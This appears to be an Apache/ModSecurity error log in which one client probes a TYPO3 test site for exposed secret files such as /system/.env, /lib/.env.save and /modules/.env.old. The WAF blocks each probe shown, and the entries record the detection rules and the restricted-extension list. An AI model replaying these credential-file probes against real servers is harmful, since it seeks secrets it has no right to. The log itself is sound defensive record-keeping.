[Sat Nov 22 00:05:57.117820 2025] [:error] [pid 243400] [client 3.9.175.83:53482] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSDwVfeCuJGFTSZ93xy5YAAAAAU"]
[Sat Nov 22 00:05:57.199865 2025] [:error] [pid 243341] [client 3.9.175.83:53450] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSDwVQqyqiDG5tICQX6npwAAAAE"]
[Sat Nov 22 00:05:57.200087 2025] [:error] [pid 243341] [client 3.9.175.83:53450] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSDwVQqyqiDG5tICQX6npwAAAAE"]
[Sat Nov 22 00:05:57.200256 2025] [:error] [pid 243341] [client 3.9.175.83:53450] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSDwVQqyqiDG5tICQX6npwAAAAE"]
[Sat Nov 22 00:05:57.228314 2025] [authz_core:error] [pid 243398] [client 3.9.175.83:53304] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application
[Sat Nov 22 00:05:57.380517 2025] [:error] [pid 243340] [client 3.9.175.83:53434] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSDwVZeLEhOLAInnw0NqggAAAAA"]
[Sat Nov 22 00:05:57.380735 2025] [:error] [pid 243340] [client 3.9.175.83:53434] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSDwVZeLEhOLAInnw0NqggAAAAA"]
[Sat Nov 22 00:05:57.380952 2025] [:error] [pid 243340] [client 3.9.175.83:53434] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSDwVZeLEhOLAInnw0NqggAAAAA"]
[Sat Nov 22 00:05:57.381133 2025] [:error] [pid 243340] [client 3.9.175.83:53434] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSDwVZeLEhOLAInnw0NqggAAAAA"]
[Sat Nov 22 00:05:57.494962 2025] [:error] [pid 243342] [client 3.9.175.83:53480] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSDwVSbqTrlsHApMKqWIkAAAAAI"]
[Sat Nov 22 00:05:57.495129 2025] [:error] [pid 243342] [client 3.9.175.83:53480] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSDwVSbqTrlsHApMKqWIkAAAAAI"]
[Sat Nov 22 00:05:57.495334 2025] [:error] [pid 243342] [client 3.9.175.83:53480] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSDwVSbqTrlsHApMKqWIkAAAAAI"]
[Sat Nov 22 00:05:57.495512 2025] [:error] [pid 243342] [client 3.9.175.83:53480] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSDwVSbqTrlsHApMKqWIkAAAAAI"]
[Sat Nov 22 00:05:57.497552 2025] [:error] [pid 243344] [client 3.9.175.83:53514] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSDwVRprncRmilB7cHSomQAAAAg"]
[Sat Nov 22 00:05:57.497730 2025] [:error] [pid 243344] [client 3.9.175.83:53514] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSDwVRprncRmilB7cHSomQAAAAg"]
[Sat Nov 22 00:05:57.497882 2025] [:error] [pid 243344] [client 3.9.175.83:53514] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSDwVRprncRmilB7cHSomQAAAAg"]
[Sat Nov 22 00:05:57.944459 2025] [:error] [pid 243343] [client 3.9.175.83:53684] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSDwVYNKGNllPFPT2VHknAAAAAY"]
[Sat Nov 22 00:05:57.944689 2025] [:error] [pid 243343] [client 3.9.175.83:53684] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSDwVYNKGNllPFPT2VHknAAAAAY"]
[Sat Nov 22 00:05:57.944884 2025] [:error] [pid 243343] [client 3.9.175.83:53684] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSDwVYNKGNllPFPT2VHknAAAAAY"]
[Sat Nov 22 00:05:58.061218 2025] [:error] [pid 243398] [client 3.9.175.83:53876] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSDwVhxGpDYkt8_grHyz0wAAAAQ"]
[Sat Nov 22 00:05:58.061387 2025] [:error] [pid 243398] [client 3.9.175.83:53876] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSDwVhxGpDYkt8_grHyz0wAAAAQ"]
[Sat Nov 22 00:05:58.061589 2025] [:error] [pid 243398] [client 3.9.175.83:53876] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSDwVhxGpDYkt8_grHyz0wAAAAQ"]
[Sat Nov 22 00:05:58.061789 2025] [:error] [pid 243398] [client 3.9.175.83:53876] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSDwVhxGpDYkt8_grHyz0wAAAAQ"]
[Sat Nov 22 00:05:58.203465 2025] [authz_core:error] [pid 243390] [client 3.9.175.83:53784] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/system
[Sat Nov 22 00:06:06.169189 2025] [:error] [pid 243400] [client 3.9.175.83:56426] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSDwXveCuJGFTSZ93xy5YQAAAAU"]
[Sat Nov 22 00:06:06.169385 2025] [:error] [pid 243400] [client 3.9.175.83:56426] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSDwXveCuJGFTSZ93xy5YQAAAAU"]
[Sat Nov 22 00:06:06.170743 2025] [:error] [pid 243400] [client 3.9.175.83:56426] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSDwXveCuJGFTSZ93xy5YQAAAAU"]
[Sat Nov 22 00:06:06.170972 2025] [:error] [pid 243400] [client 3.9.175.83:56426] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSDwXveCuJGFTSZ93xy5YQAAAAU"]
[Sat Nov 22 00:06:06.244869 2025] [:error] [pid 243342] [client 3.9.175.83:56494] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSDwXibqTrlsHApMKqWIkQAAAAI"]
[Sat Nov 22 00:06:06.245108 2025] [:error] [pid 243342] [client 3.9.175.83:56494] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSDwXibqTrlsHApMKqWIkQAAAAI"]
[Sat Nov 22 00:06:06.245285 2025] [:error] [pid 243342] [client 3.9.175.83:56494] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSDwXibqTrlsHApMKqWIkQAAAAI"]
[Sat Nov 22 00:06:06.254666 2025] [:error] [pid 243398] [client 3.9.175.83:56528] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSDwXhxGpDYkt8_grHyz1AAAAAQ"]
[Sat Nov 22 00:06:06.254837 2025] [:error] [pid 243398] [client 3.9.175.83:56528] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSDwXhxGpDYkt8_grHyz1AAAAAQ"]
[Sat Nov 22 00:06:06.255049 2025] [:error] [pid 243398] [client 3.9.175.83:56528] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSDwXhxGpDYkt8_grHyz1AAAAAQ"]
[Sat Nov 22 00:06:06.255227 2025] [:error] [pid 243398] [client 3.9.175.83:56528] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSDwXhxGpDYkt8_grHyz1AAAAAQ"]
[Sat Nov 22 00:06:06.287711 2025] [:error] [pid 243344] [client 3.9.175.83:56472] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSDwXhprncRmilB7cHSomgAAAAg"]
[Sat Nov 22 00:06:06.288052 2025] [:error] [pid 243344] [client 3.9.175.83:56472] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSDwXhprncRmilB7cHSomgAAAAg"]
[Sat Nov 22 00:06:06.288246 2025] [:error] [pid 243344] [client 3.9.175.83:56472] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSDwXhprncRmilB7cHSomgAAAAg"]
